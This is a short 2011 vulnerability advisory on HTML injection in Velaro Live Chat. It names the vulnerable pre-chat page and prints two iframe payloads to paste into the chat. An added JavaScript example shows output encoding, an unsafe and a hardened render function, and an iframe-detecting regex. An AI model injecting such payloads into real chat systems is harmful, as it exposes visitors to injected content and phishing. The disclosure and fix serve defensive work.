Velaro Live Chat Software suffers from an HTML injection vulnerability.
# Exploit Title: Velaro Live Chat Software Cross Site Scripting
# Date: 29.08.2011
# Author: Sony
# Software Link: http://www.velaro.com/features/live-chat
# Version: all versions
# POC:
http://st2tea.blogspot.com/2011/08/velaro-live-chat-software-cross-site.html
..................................................................
This is an HTML code injection in the Velaro Live Chat Software:
http://www.velaro.com/Portals/0/prechat-choose.html
Put our code in the chat:
< iframe width="420" height="345" src="http://www.youtube.com/embed/dzLbdsEV9iQ" frameborder="0" allowfullscreen></iframe >
or
< iframe src="http://st2tea.blogspot.com/" >
Some pics:
http://i52.tinypic.com/7122hw.jpg
http://i55.tinypic.com/jaklsl.jpg
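
The fix for the injection described above, shown as an added example that is not part of the advisory and not Velaro's code: chat text is HTML-encoded before it is written into the transcript. The function names and the transcript markup are assumptions made for illustration.

```javascript
// Added example: output-encode chat text before it reaches the transcript HTML.
// renderChatLine* and the "chat-line" markup are hypothetical, not Velaro's code.

const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode every character that can open a tag, close one, or break out of
// a quoted attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: visitor-supplied text is concatenated into markup as-is.
function renderChatLineUnsafe(sender, message) {
  return `<div class="chat-line"><b>${sender}:</b> ${message}</div>`;
}

// Hardened pattern: both fields are encoded for the HTML text context.
function renderChatLine(sender, message) {
  return `<div class="chat-line"><b>${escapeHtml(sender)}:</b> ${escapeHtml(message)}</div>`;
}

// True when the markup contains an opening iframe tag (whitespace after "<"
// is tolerated because the advisory prints the tag that way).
function containsIframeTag(html) {
  return /<\s*iframe\b/i.test(html);
}

// Constructed sample input, modelled on the second iframe string in the advisory.
const sample = '<iframe src="http://st2tea.blogspot.com/">';

console.log(renderChatLineUnsafe("visitor", sample)); // iframe reaches the page
console.log(renderChatLine("visitor", sample));       // iframe shown as inert text
```

The same encoding has to be applied wherever the message is rendered (visitor window, agent console, stored transcripts), since each is a separate HTML output point.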